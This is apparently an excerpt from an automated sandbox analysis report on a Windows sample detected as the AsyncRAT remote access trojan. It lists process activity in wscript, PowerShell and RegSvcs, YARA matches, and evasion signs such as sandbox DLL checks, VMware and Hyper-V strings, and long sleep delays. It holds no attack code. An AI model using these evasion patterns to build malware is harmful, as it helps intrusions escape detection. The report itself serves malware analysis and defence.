              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
              Yara detected AsyncRAT
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: powershell.exe, 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5339Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3707Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1797Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4855
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6698
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3123
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7329
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1371
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8463
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 1912Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 1912Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep count: 1797 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep count: 289 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 500Thread sleep count: 4855 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 500Thread sleep count: 3970 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 7329 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep count: 1371 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep time: -13835058055282155s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484Thread sleep count: 8463 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 347 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2260569508.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3363554166.000001B3F885D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3362988632.000001B3F322B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000003.00000002.2244830635.0000016D403D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_Ct
              Source: RegSvcs.exe, 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

